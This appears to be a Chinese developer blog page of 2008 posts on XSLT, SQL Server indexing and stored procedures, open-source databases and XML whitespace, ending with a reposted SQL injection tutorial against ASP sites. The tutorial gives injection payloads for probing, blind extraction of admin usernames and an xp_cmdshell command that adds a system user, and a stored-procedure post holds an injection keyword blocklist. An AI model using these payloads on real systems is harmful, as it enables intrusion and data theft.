程序开发 - 艺风在线 - Power By CSZI.com

xsl:param 与 xsl:variable 的区别

一线风 — 2008-12-25 9:42:13

元素
--------------------------------------------------------------------------------
定义与用法
元素被用来声明一个局部或者全局的参数。
说明：如果声明的是一个高级（top-level）的元素那么参数是全局的，如果在一个样规中声
明那么是局部的。

元素（xsl的variable是常量不能再改变）
--------------------------------------------------------------------------------
定义与用法
元素被用来声明一个局部或者全局的变量。
说明：当声明为高级（top-level）元素时，变量是全局的，当在一个template 中声明时，作
为局部变量。
说明：一旦您设置了一个变量的值，您就不能修改这个值！
提示：您可以通过增加的内容或者用select 属性来设置变量值！

看了二者的定义和用法，一个声明的是“参数”,另一个声明的是“变量”。

参数是用来传递的，变量是拿来本地（局部或者全局）用的。例子：

XML/HTML代码

<xsl:temaplte match="/">
<xsl:variable name="var1" select=" 'I am variable 1.' "/>
<xsl:call-template name="to-ba-called">
<xsl:with-param name="param1" select="$var1"/>
xsl:call-template>
xsl:template>
<xsl:template name="to-be-called">
<xsl:param name="param1"/>
<param1><xsl:value-of select="$param1"/><param1>
xsl:template>

屏蔽掉其他输出之后，结果输出：
I'm variable 1.

元素类似于元素，它具有与相同的属性，而且那些支配元素属性的规则也同样适用于元素的属性，规则的作用范围也相同。不过，可以从用户处得到一个输入值。这意味着不仅可以通过该元素的select属性或在模板中使用模板指令来创建数值，还可以通过 with-param元素创建数值。对于元素只能通过该元素的select属性或在模板中使用模板指令来创建数值，数值一旦创建不可更改。

param的父节点限制要多于variable

mssql多索引的应用

一线风 — 2008-3-24 17:45:45

合理的设计索引,正确的使用索引.

大家注意一点，这个LX_STUDENTINFO索引，是四个索引字段，而他们的顺序studycenternumber,studentnumber,studentname,studentcrtificatenumber，在数据库设计中，如果查询采用的第一个字段和第二个字段组合，则该索引有效；如果查询采用第一个、第二个和第三个字段组合，该索引也有效；而如果第一个和第三个，或第四个组合，则该索引是无效的，等同的效果仍是在没有索引的数据库中进行查询。也就是说建立的索引中的字段，在查询使用时，不能隔字段使用。

另外，索引中涉及到字段的顺序也会影响查询的性能，如果一个索引包含两个字段A1和A2，那么在查询时，一定要严格按索引中这两个字段的顺序设计查询，比如：select * from a where A1='A' and A2='B'。而如果程序员写成了select * from a where A2='B' and A1='A'的话，虽然不影响程序正常使用，但会增加数据库的压力，并且查询效能会降低。(注:这个,我觉得Mssql好像是能自动优化的)

树立的观念：一个SQL语句，如果在压力测试时CPU占有率达到100%，此语句肯定存在问题。

在大多数程序员的心里，一直认为数据库加索引，在查询中使用索引，就可以提高数据库性能。其实这种观点有一点的局限性，如果不好好的利用已经建立好的数据库索引，有时反倒给数据库增加更大的处理压力。现在我们举例说明一下：

在现有的个人信息管理系统登录处的查询中，有这么一个SQL语句：

Select StudentInfoID, StudentNumber, StudentName,UnifyExamInfoID,NetSchoolID from StudentInfo

where StudentCrtificateNumber ='130425831217494' and rtrim(ltrim(StudentNumber)) = 'D0462382001'

此SQL语句的目的是查找这个考生是否存在，验证登录的效果，就是这么一个简单的SQL语句，在压力测试时，10个用户同时登录，就会造成数据库服务器（2CPU，4G内存，IBM专用服务器）CPU占有率达到100%。而这张表也建立了StudentCrtificateNumber 和 StudentNumber 两个字段的索引，问题出在哪呢？原因如下：

（1）在studentinfo表中，建立了一个索引LX_STUDENTINFO，包括了四个字段，顺序为：studycenternumber,studentnumber,studentname,studentcrtificatenumber。

（2）程序员理解的是，这个索引中包括了这两个字段，那么查询时就应该很快。实际不是。

根据这种思路，重新调整了一下这个表的索引，在这个表中增加了一个新的索引，只包括这两个字段，并且按StudentCrtificateNumber 和StudentNumber先后顺序排序。经过300人同时登录的压力测试，CPU占有率才只占2-3%，证明调整结果有效。

(如果一个表的数据是查少入多的话,还是少建的好)

合理的设计索引,正确的使用索引.

如何编写高效的存储过程

一线风 — 2008-3-10 14:18:54

使用存储过程有如下好处：

1. 使用存储过程可以对所执行的SQL语句进行封装，在接口保持不变的情况下不影响调用程序。

2. 最大限度的重用已缓存的执行计划。

3. 减少网络流量。

4. 提供更好的数据库安全控制，防止直接对表的操作。

存储过程的编译占用CPU，因此我们应该防止存储过程不必要的重新编译。
正常的编译发生于：

1. 所引用的表中大部分的数据发生了的更改，导致统计信息变化过大。

2. 所引用的表的架构被修改，包括添加或取消约束、默认值或规则。

3. 明确使用WITH RECOMPILE强制每次执行过程时重新编译或sp_recompile使用过程缓存无效。

4. 由于服务器内存不足或长期不使用，使缓存过程被清除。

转自:http://www.cnblogs.com/tom-fu/archive/2008/03/09/1096993.html

在以下情况下，过程会被不必要的重新编译：

1. 在调用过程时，不指定架构所有者。
这时为了找到正确的缓存计划，SQLServer会按照如下顺序查找过程所属的架构：
①sys
②调用此过程所属于的架构，如果是被其它过程所包含，则首先查询包含过程的架构
③dbo
为了能重新编译此过程，必须要对过程施加编译锁，因此在很多用户并行访问时可能会带来额外的等待时间。可通过sys.dm_exec_requests动态视图或master.dbo.sysprocesses系统表进行观察，如果lastwaittypee出现LCK_M_X，则表示出现了编译锁。

2. 过程在临时表上执行了特定操作。
在过程中经常会用到临时表与表变量，一直有种误解是表变量只会存储于内存中。其实如果两者都足够小的话，是不会保存于磁盘中的，但是两者的架构是都会存在于tempdb定义中的。只有在内存不足时，才会把数据存储于磁盘中。以下示例可查看表变量也是存储于tempdb中：
DECLARE @employee TABLE(employeeId INT);

INSERT INTO @employee VALUES(1);

SELECT * FROM tempdb.INFORMATION_SCHEMA.TABLES

WHERE TABLE_NAME LIKE '%#%';

这时会看到TABLE_NAME有一#开头的记录
选择这两者的主要依据如下：
①对于小数据量的中间表优先使用表变量，反之如果数据量大且被用于连接，则使用临时表。因为在表变量中只能定义主键和约束，如果在进行联结时，必须在要联结的字段上建立索引，从而防止出现哈稀联结而占用过多的资源。联结的三种算法嵌套循环、合并与哈稀所占用的资源依次增加，而前两者的前提是在联结的字段上存在索引时，根据数据量多少而决定的。

②中间表对事务的影响，临时表的回滚会影响上层事务，而表变量不会。

③可见性问题。临时表对下次均可见，而表变量只在所声明的层次可见。

另一个重要的选择依据就是在对临时表会创建相应的统计信息，因此在过程中引用临时表是可能会迫使语句因为引用的表的统计变化而被重新编译多次。以下示例演示了此过程，为了能看到被重新编译的事件，请在跟踪事件中选择SP:Starting、SP:StmtStarting、SP:Recompile 和 SP:Completed，注意SP:StmtStarting与SP:StmtCompleted 事件，最好不要同时包含这两个事件，因为这样会将需要查询的信息量加倍。
USE AdventureWorks;

CREATE PROCEDURE GetCustomerOrder

CREATE TABLE #t (SalesOrderID int, CustomerID int)

SELECT * FROM #t

INSERT #t

SELECT SalesOrderID, CustomerID

FROM Sales.SalesOrderHeader

SELECT COUNT(*) FROM #t

WHERE CustomerID = 40

EXEC GetCustomerOrder
通过上面的结果我们看到，每次在对临时表进行操作时，都会引起一次过程的重新编译。在查询CustomerID = 40时，可以看到有一SELECT语句正是为了能获得所需的统计信息而发生的。可以使用sp_executesql

来防止这种额外的编译，修改过程如下，再次跟踪事件：
USE AdventureWorks;

ALTER PROCEDURE GetCustomerOrder

CREATE TABLE #t (SalesOrderID int, CustomerID int)

SELECT * FROM #t

EXEC sp_executesql N'

INSERT #t

SELECT SalesOrderID, CustomerID

FROM Sales.SalesOrderHeader'

EXEC sp_executesql N'SELECT COUNT(*) FROM #t WHERE CustomerID = @CustomerID',

N'@CustomerID int', @CustomerID = 40

EXEC GetCustomerOrder

此时我们发现只要是使用sp_executesql执行的语句都没有引起语句的重新编译。虽然此处演示的是使用临时表，但对永久表而言同样也存在这种问题。另一种做法是使用KEEP PLAN，不推荐使用。因此，我们应该优先使用sp_executesql，使用它所执行的语句在缓存中只会存在一条语句，而使用EXEC会根据具体的参数为每条不同的语句生成一个缓存计划。从而占用过多的缓存。

3. 过程定义中出现DDL和DML的交错。以下示例演示引起重新编译：
USE AdventureWorks;

CREATE PROCEDURE GetOrderInfo

-- DDL

CREATE TABLE #CompleteOrder(SalesOrderID int, CustomerID int)

-- DML

SELECT * FROM #CompleteOrder

-- DDL

CREATE INDEX idx_#CompleteOrder ON #CompleteOrder(SalesOrderID)

-- DML

SELECT * FROM #CompleteOrder

-- DDL

CREATE TABLE #ProcOrder (a int)

-- DML

SELECT * FROM #ProcOrder

EXEC GetOrderInfo

SQL2005引入了新的语句级重新编译技术，有效的防止了因为部分语句引起的整个过程或批的重新编译。因此在SQL2000中跟踪到的内容会与图示所示存在不同之处。
另一个对临时表的命名问题，请慎记不要随便起一个#T1作为临时表的名称。这在过程不调用其它过程时不会造成问题，但在调用的另一过程中也存在一个#T1的临时表时，就会造成问题。以上示例演示：
SET NOCOUNT ON;

USE tempdb;

IF OBJECT_ID('dbo.proc1') IS NOT NULL

DROP PROC dbo.proc1;

IF OBJECT_ID('dbo.proc2') IS NOT NULL

DROP PROC dbo.proc2;

CREATE PROC dbo.proc1

CREATE TABLE #T1(col1 INT NOT NULL);

INSERT INTO #T1 VALUES(1);

SELECT * FROM #T1;

EXEC dbo.proc2;

CREATE PROC dbo.proc2

CREATE TABLE #T1(col1 INT NULL, col2 INT NOT NULL);

INSERT INTO #T1 VALUES(2, 2);

SELECT * FROM #T1;

EXEC dbo.proc1;

因此，请在对临时表命名时使用过程名称与临时表名称的组，如#proc_T1。这样会有效的防止此类问题的出现。

4. 另一个值得注意的问题是，我们不应该使用sp_作为自定义存储过程的前缀。这是微软用作系统存储过程的前缘。在调用以sp_开头的过程时，会首先在master数据库中进行查找，如果找不到才会在用户数据库中查找。如果要使过程真正成为系统过程要使用sp_MS_marksystemobject过程，如下所示：
USE master;

EXEC sp_MS_marksystemobject 'dbo.sp_Proc1';
同样对表或其它对象的命名时也不要以sp_作为前缀。

5. 另一个问题是安全方面的，因为传入的参数可能会引起脚本注入的危险，因此应该对每个参数进行一些判断，以下是一种通用的判断语句，可应用于每个参数：
IF UPPER(@cols) LIKE UPPER(N'%0x%')

OR UPPER(@cols) LIKE UPPER(N'%;%')

OR UPPER(@cols) LIKE UPPER(N'%''%')

OR UPPER(@cols) LIKE UPPER(N'%--%')

OR UPPER(@cols) LIKE UPPER(N'%/*%*/%')

OR UPPER(@cols) LIKE UPPER(N'%EXEC%')

OR UPPER(@cols) LIKE UPPER(N'%xp_%')

OR UPPER(@cols) LIKE UPPER(N'%sp_%')

OR UPPER(@cols) LIKE UPPER(N'%SELECT%')

OR UPPER(@cols) LIKE UPPER(N'%INSERT%')

OR UPPER(@cols) LIKE UPPER(N'%UPDATE%')

OR UPPER(@cols) LIKE UPPER(N'%DELETE%')

OR UPPER(@cols) LIKE UPPER(N'%TRUNCATE%')

OR UPPER(@cols) LIKE UPPER(N'%CREATE%')

OR UPPER(@cols) LIKE UPPER(N'%ALTER%')

OR UPPER(@cols) LIKE UPPER(N'%DROP%')

BEGIN

SET @msg = N'Possible SQL injection attempt.';

RAISERROR(@msg, 16, 1);

RETURN;

END

以上是个人的一点看法，如果有任何异议请与我一同分享！

开源有感系列之开源数据库有感

一线风 — 2008-2-27 18:28:41

原文：http://www.cnblogs.com/unruledboy/archive/2005/02/04/98604.html

开源世界真是太奇妙了，虽然不排除卑鄙无耻的直接盗用并贯为自己的产品，但开源可以无私到随便你怎样用。

接触开源有很长的一段时间了，先是学习别人的，然后还参与了开源，在sf.net上，我主持和参与了数个开源项目，当然，都不是大型的项目，只是尝试一下。

我所关注的开源项目方面很多，每方面都有很多优秀的作品，我将会在接下来的系列随笔中介绍，这次介绍数据库。

这个星球上的数据库实在不胜枚举，这里只列一些我接触过的常见的。

可以稍微夸张点说，有交互的应用，起码得用一下数据保存，即便是自定义结构的数据保存，还是最常见的INI、XML等，都可以算是“数据库”，真正点的，如DBase系列、FoxBase、FoxPro、MSAccess、InterBase、MS SQL Server、Oracle、DB2等，这些是商业化的数据库，前面几个只能算是数据库，后面几个是RMDBS（关系型数据库管理系统）。

对应商业化的，有开源的：SQLite、SimpleSQL、Berkely DB、Minosse、Firebird( 前身是是Borland公司的InterBase)、PostgreSQL、MySQL等。

□SQLite：大家可以看我的SQLite系列随笔，C编写的，可以跨操作平台，支持大部分ANSI SQL 92，它是嵌入式的轻量级关系形数据库引擎，只需要一个DLL，体积为250k，数据库也只是一个文件，零配置，便可工作。既然开源，你甚至可以把它嵌入你的程序中。核心开发人员只有一个，最近加入了另外一个，也就是2个人而已，实在佩服，目前发展到3.1.0，相当高效稳定，有开源驱动在sourceforge.net上有其ADO.NET Data Provider for SQLite ：https://sourceforge.net/projects/adodotnetsqlite/ 。

□SimpleSQL：相对SQLite要大几倍，但也是轻量级的，功能稍微强大一点，C++编写，有OLE、Java等版本。

□Berkely DB：C++编写的大型关系型数据库系统，还额外地支持XML(把XML当成数据库)，号称2百万的安装量，MySQL也只不过号称5百万安装量而已，跨平台。

□Minosse：纯C#编写的大型关系型数据库系统，理想是超越MS SQL Server！最新版本：0.2.0，真难得，纯Java写的看得多了，纯C#的，不是移植别人的，还是第一个，佩服作者：包含C/S和嵌入式版本，并可跨越大部分平台，因为它不用Windows的东西，可以在Mono下编译。

□Firebird：这个东西太牛了，目前有1.5稳定版本已经拥有大量特性，完全支持ANSI SQL92、98等，一些超酷的特性让人疯狂(1.0特性、1.5特性，从这里开始研究)，主要开发人员是一个俄罗斯人，目前开发队伍已经扩大到近100人，有3种模式，单机独立，典型C/S，超级服务器。2.0版本和3.0版本将在近期推出，看完其路线图(2.0、3.0)你就会疯掉。有.NET驱动，目前是1.7beta版。主要特性：
    ◆A.C.I.D；
    ◆MGA(任何版本的引擎都可以处理同一数据库记录)；
    ◆PSQL(存储过程)超级强大，ms sql相对的太次，它啥都能在服务器端实现并推送到客户端成为强大的报表，存储过程；
    ◆触发器都可以在客户端获取监控追踪；
    ◆自动只读模式；
    ◆创新的事务保证绝对不会出错；
    ◆24*7运行中仍然可以随时备份数据库；
    ◆统一触发器：任何操作都可以让某表唯一的触发器来总控；
    ◆大部分语言都可以写plug-in，并直接在存储过程中调用函数；
    ◆c->c++，更加少的代码但更加快的速度；
    ◆3种运行模式，甚至可以嵌入式；
    ◆主流语言都可以调用它；
    ◆动态sql执行；
    ◆事务保存点；

□PostgreSQL：POSTGRES数据库的后开源版本，号称拥有任何其他数据库没有的大量新特性，似乎目标是要做超大型的OO关系型数据库系统，目前已经发展到8.0，有.NET驱动，中文官方网站有详细介绍。

□MySQL：这个，不用说了吧？号称全球最受欢迎的开源数据库，但让我奇怪的是，PostgreSQL都有简体中文的支持：包括内核、管理工具、QA等等，在最新版本MySQL中，我却没有发现... ，有.NET驱动，其中MySQL Connector/Net就是原来在sf.net上的ByteFX.Data项目，作者已经加入了MySQL团队，参看《感慨 20 之开源的前途/钱图？（１数据库）》。

XML 中的空白字符须知

一线风 — 2008-2-25 12:49:15

了解 XML 空白字符的概念并掌握如何避免与之相关的问题的技巧。

很多时候，您可能都没注意到，在 XML 中所做的更改影响着您访问 XML 文档中数据的方式。例如：

JohnSmith

完全不同于


John
Smith

原文地址：http://www.oracle.com/technology/global/cn/pub/articles/wang-whitespace.html

以下是一个完整的示例（请参阅示例代码中的示例 1）：假设您希望使用 DOM API 获取的第一个子元素，如下所示：

XMLDocument doc = parser.getDocument();
Element elem = doc.getDocumentElement();
Node node = elem.getFirstChild();

利用 Oracle XDK DOM 分析器的默认设置，第一个文档返回的同时，第二个文档返回一个为空白字符节点的文本节点。

同样，有时 XSLT 转换不会生成您预期的结果。（请参阅示例 2。）XML 文档需要使用 XSLT 进行转换。XSL 样式表使用 position() 函数来为和

元素创建排序信息：

然而，以下 XSL 样式表：

并不会按期望运行，它将产生以下结果：

位置不正确是由空白字符造成的。如果在 XSLT 转换中调用 position() 函数删除之前使用以下样式表删除空白字符：

将生成期望的结果：

对于此例，如果不希望删去所有 XML 元素的空白字符，可使用代替。

以下部分将介绍 XML 空白字符的概念以及避免此类问题的技巧。

什么是 XML 空白字符？

XML 将以下四种字符归为空白字符：回车符（\r 或 ch(13)）、换行符（\n 或 ch(10)）、制表符 (\t) 以及空格 (' ')。在 XML 文档中，空白字符分为两类：

有意义空白字符 是文档内容的一部分，应予以保留。
无意义空白字符 在编辑 XML 文档时使用，以增加可读性。这些空白字符一般在文档交付时不予保留。

通常，若没有 DTD 或 XML 模式定义，所有空白字符都是有意义空白字符，应当保留。然而，如果有 DTD 或 XML 模式定义，则只有以下内容中的空白字符有意义：


   ------------------   
John Smith
Product Manager   
Example.com   
   --------------------

XML 处理器如何处理 XML 空白字符

XML 标准详细说明了 XML 处理器应如何处理空白字符。

XML 分析：XML 规范提供了一个内置属性 xml:space 来告知 XML 分析器其是否应忽略空白字符。该属性由其根元素的子元素来继承。声明时，必须将其指定为枚举类型，其可能的值只能是“default”和“preserve”。如果指定为“preserve”，则所定义元素内的空白字符必须保留。

根据 W3C XML 规范，默认情况下，Oracle XML 开发人员工具包 (XDK) XML 分析器将保留所有空白字符。因此，xml:space =“default”或 xml:space =“preserve ”将具有相同的作用：保留空白字符。若要避免保留空白字符，需要按如下所示设置 Oracle XDK 分析器：

XDK DOM Parser：

DOMParser parser = new DOMParser();
parser.setPreserveWhitespace(false);

SAX Parser：

SAXParser parser = new SAXParser();
parser.setPreserveWhitespace(false);

XSLT 转换。W3C XSLT 规范提供了两个元素（即 xsl:strip-space 和 xsl:preserve-spacea€”）来处理空白字符。xsl:strip-space 指定了应删除空白字符文本节点（即文本节点完全由空白字符组成）的 XML 元素。请注意，xsl:strip-space 只有影响纯空白字符的节点。xsl:strip-space 可以列为一组由空白字符或使用通配符（例如 *）隔开的元素。xsl:preserve-space 具有类似的语法，但执行的结果却与 xsl:strip-space 正好相反。

以下示例（请参阅示例 3）应用了一个复制源文档的 XSL 样式表，但删去了空白字符文本节点：

对于如下所示的 XML 文档：

 
 
Value 
This is the test 
 
Value

XSLT 转换将生成以下结果：

 
Value 
This is the test 
 
Value

您可能注意到，如果 XML 元素中的 xml:space="preserved"，则不会删去空白字符。这种行为基于 XSLT 规范，该规范定义了保留空白字符的条件：

文本节点的父元素具有的 xml:space 属性值为 preserve，并且没有更近的父元素具有带有默认值的 xml:space。

XSLT 还提供 normalize-space() 函数，将包含多个空白字符的字符串转换为一个空白字符，从作为参数传递给它的字符串删除所有前导空白字符和尾随空白字符。

DOM 序列化。序列化 XML 文档时，输出缩进将添加无意义空白字符。默认情况下，Oracle XDK DOM 分析器将以缩进格式打印 XML DOM 文档。

要避免缩进，在 XDK 9i 中，可将 oracle.xml.parser.v2.XMLPrintDriver 类划分为子类，如下所示（请参阅示例 4）：

import oracle.xml.parser.v2.XMLPrintDriver;
import oracle.xml.parser.v2.XMLOutputStream;

class MyXMLPrintDriver extends XMLPrintDriver
   {
public MyXMLPrintDriver(java.io.OutputStream A)
   {
super(A);
out.setOutputStyle(XMLOutputStream.COMPACT);
   }
   }

在 Oracle XDK 10g 中，新增了一个函数 oracle.xml.parser.v2.XMLPrintDriver.setFormatPrettyPrint()，可用于避免执行子类划分操作。使用 Oracle XDK 10g，您可以打印不带缩进的 XML DOM 文档，如下所示（请参阅示例 5）：

XMLPrintDriver myprint = new XMLPrintDriver(System.out);
myprint.setFormatPrettyPrint(false);
Xml_doc.print(myprint);

结论

现在，利用这些基本知识，您可以成功避免由 XML 文档中的空白字符引发的问题。

ASP/SQL 注入天书

一线风 — 2008-2-2 16:33:15

随着 B/S 模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的 SQL Injection，即ＳＱＬ注入。

引言

ＳＱＬ注入是从正常的 WWW 端口访问，而且表面看起来跟一般的 Web 页面访问没什么区别，所以目前市面的防火墙都不会对ＳＱＬ注入发出警报，如果管理员没查看 IIS 日志的习惯，可能被入侵很长时间都不会发觉。

但是，ＳＱＬ注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

根据国情，国内的网站用 ASP+Access 或 SQLServer 的占 70% 以上，PHP+MySQ 占 20%，其他的不足 10%。在本文，我们从分入门、进阶至高级讲解一下 ASP 注入的方法及技巧，PHP 注入的文章由 NB 联盟的另一位朋友 zwell 撰写，希望对安全工作者和程序员都有用处。了解 ASP 注入的朋友也请不要跳过入门篇，因为部分人对注入的基本判断方法还存在误区。大家准备好了吗？ Lets Go...

入门篇

如果你以前没试过ＳＱＬ注入的话，那么第一步先把 IE 菜单 =>工具 => Internet 选项 => 高级 => 显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为 HTTP 500 服务器错误，不能获得更多的提示信息。

第一节、ＳＱＬ注入原理

以下我们从一个网站 www.mytest.com 开始（注：本文发表前已征得该站站长同意，大部分都是真实数据）。

在网站首页上，有名为“ IE 不能打开新窗口的多种解决方法”的链接，地址为：http://www.mytest.com/showdetail.asp?id=49，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：

Microsoft JET Database Engine 错误 80040e14
字符串的语法错误在查询表达式 ID=49 中。
/showdetail.asp，行8

从这个错误提示我们能看出下面几点：

网站使用的是Access数据库，通过JET引擎连接数据库，而不是通过ODBC。
程序没有判断客户端提交的数据是否符合程序要求。
该SQL语句所查询的表中有一名为ID的字段。

从上面的例子我们可以知道，ＳＱＬ注入的原理，就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料。

第二节、判断能否进行ＳＱＬ注入

看完第一节，有一些人会觉得：我也是经常这样测试能否注入的，这不是很简单吗？其实，这并不是最好的方法，为什么呢？

首先，不一定每台服务器的 IIS 都返回具体错误提示给客户端，如果程序中加了 cint(参数) 之类语句的话，ＳＱＬ注入是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。

其次，部分对ＳＱＬ注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，这种情况不为少数，如果你用单引号测试，是测不到注入点的

那么，什么样的测试方法才是比较准确呢？答案如下：

这就是经典的 1=1、1=2 测试法 了，怎么判断呢？看看上面三个网址返回的结果就知道了，可以注入的表现：

正常显示（这是必然的，不然就是程序有错误了）
正常显示，内容基本与 1 相同
提示 BOF 或 EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof 时）、或显示内容为空（程序加了on error resume next）

不可以注入就比较容易判断了，1 同样正常显示，2 和 3 一般都会有程序定义的错误提示，或提示类型转换时出错。

当然，这只是传入参数是数字型的时候用的判断方法，实际应用的时候会有字符型和搜索型参数，我将在中级篇的“ＳＱＬ注入一般步骤”再做分析。

第三节、判断数据库类型及注入方法

不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下数据库的类型。一般 ASP 最常搭配的数据库是 Access 和 SQLServer，网上超过 99% 的网站都是其中之一。

怎么让程序告诉你它使用的什么数据库呢？来看看： SQLServer 有一些系统变量，如果服务器 IIS 提示没关闭，并且 SQLServer 返回错误提示的话，那可以直接从出错信息获取，方法如下：

http://www.mytest.com/showdetail.asp?id=49 ;and user>0

这句语句很简单，但却包含了 SQLServer 特有注入方法的精髓，我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在 and user>0，我们知道，user 是 SQLServer 的一个内置变量，它的值是当前连接的用户名，类型为 nvarchar。拿一个 nvarchar 的值跟 int 的数 0 比较，系统会先试图将 nvarchar 的值转成 int 型，当然，转的过程中肯定会出错， SQLServer 的出错提示是：将 nvarchar 值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc 正是变量 user 的值，这样，不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语句。

顺便说几句，众所周知，SQLServer 的用户 sa 是个等同 Adminstrators 权限的角色，拿到了 sa 权限，几乎肯定可以拿到主机的 Administrator 了。上面的方法可以很方便的测试出是否是用 sa 登录，要注意的是：如果是 sa 登录，提示是将 ”dbo” 转换成 int 的列发生错误，而不是”sa”。

如果服务器 IIS 不允许返回错误提示，那怎么判断数据库类型呢？我们可以从 Access 和 SQLServer 和区别入手，Access 和 SQLServer 都有自己的系统表，比如存放数据库中所有对象的表，Access 是在系统表 [msysobjects ]中，但在 Web 环境下读该表会提示“没有权限”，SQLServer 是在表 [sysobjects] 中，在 Web 环境下可正常读取。

在确认可以注入的情况下，使用下面的语句：

http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from sysobjects)>0
http://www.mytest.com/showdetail.asp?id=49 ;and (select count(*) from msysobjects)>0

如果数据库是 SQLServer，那么第一个网址的页面与原页面 http://www.mytest.com/showdetail.asp?id=49 是大致相同的；而第二个网址，由于找不到表 msysobjects，会提示出错，就算程序有容错处理，页面也与原页面完全不同。

如果数据库用的是 Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启 IIS 错误提示时的验证。

进阶篇

在入门篇，我们学会了ＳＱＬ注入的判断方法，但真正要拿到网站的保密内容，是远远不够的。接下来，我们就继续学习如何从数据库中获取想要获得的内容，首先，我们先看看ＳＱＬ注入的一般步骤：

第一节、ＳＱＬ注入的一般步骤

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。
其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

ID=49 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=49
注入的参数为 ID=49 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=49 And [查询条件]
Class=连续剧这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
搜索时没过滤参数的，如 keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段 like ’%关键字%’
注入的参数为 keyword=’ and [查询条件] and ‘%25’=’，即是生成语句：
Select * from 表名 where 字段 like ’%’ and [查询条件] and ‘%’=’%’

接着，将查询条件替换成SQL语句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)>=0

如果页面就与 ID=49 的相同，说明附加条件成立，即表 Admin 存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。表名猜出来后，将 Count(*) 替换成 Count(字段名)，用同样的原理猜解字段名。

有人会说：这里有一些偶然的成分，如果表名起得很复杂没规律的，那根本就没得玩下去了。说得很对，这世界根本就不存在 100% 成功的黑客技术，苍蝇不叮无缝的蛋，无论多技术多高深的黑客，都是因为别人的程序写得不严密或使用者保密意识不够，才有得下手。有点跑题了，话说回来，对于 SQLServer 的库，还是有办法让程序告诉我们表名及字段名的，我们在高级篇中会做介绍。

最后，在表名和列名猜解成功后，再使用 SQL 语句，得出字段的值，下面介绍一种最常用的方法－Ascii 逐字解码法，虽然这种方法速度很慢，但肯定是可行的方法。

我们举个例子，已知表 Admin 中存在 username 字段，首先，我们取第一条记录，测试长度：

http://www.mytest.com/showdetail.asp?id=49 ;and (select top 1 len(username) from Admin)>0

先说明原理：如果 top 1 的 username 长度大于 0，则条件成立；接着就是 >1、>2、>3 这样测试下去，一直到条件不成立为止，比如 >7成立，>8 不成立，就是 len(username)=8

当然没人会笨得从 0,1,2,3 一个个测试，怎么样才比较快就看各自发挥了。在得到 username 的长度后，用 mid(username,N,1) 截取第 N 位字符，再 asc(mid(username,N,1)) 得到 ASCII 码，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同样也是用逐步缩小范围的方法得到第 1 位字符的 ASCII 码，注意的是英文和数字的 ASCII 码在 1-128 之间，可以用折半法加速猜解，如果写成程序测试，效率会有极大的提高。

第二节、ＳＱＬ注入常用函数

有 SQL 语言基础的人，在ＳＱＬ注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的 SQL 水平，特别是一些常用的函数及命令。

Access：asc(字符) SQLServer：unicode(字符) 作用：返回某字符的ASCII码
Access：chr(数字) SQLServer：nchar(数字) 作用：与asc相反，根据ASCII码返回字符
Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L) 作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串
Access：abc(数字) SQLServer：abc (数字) 作用：返回数字的绝对值（在猜解汉字的时候会用到）
Access：A between B And C SQLServer：A between B And C 作用：判断A是否界于B与C之间

第三节、中文处理方法

在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解，“中文恐惧症”很快可以克服。先说一点常识：

Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。
SQLServer中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。

了解了上面的两点后，是不是觉得中文猜解其实也跟英文差不多呢？除了使用的函数要注意、猜解范围大一点外，方法是没什么两样的。

高级篇

看完入门篇和进阶篇后，稍加练习，破解一般的网站是没问题了。但如果碰到表名列名猜不到，或程序作者过滤了一些特殊字符，怎么提高注入的成功率？怎么样提高猜解效率？请大家接着往下看高级篇。

第一节、利用系统表注入SQLServer数据库

SQLServer 是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子：

http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
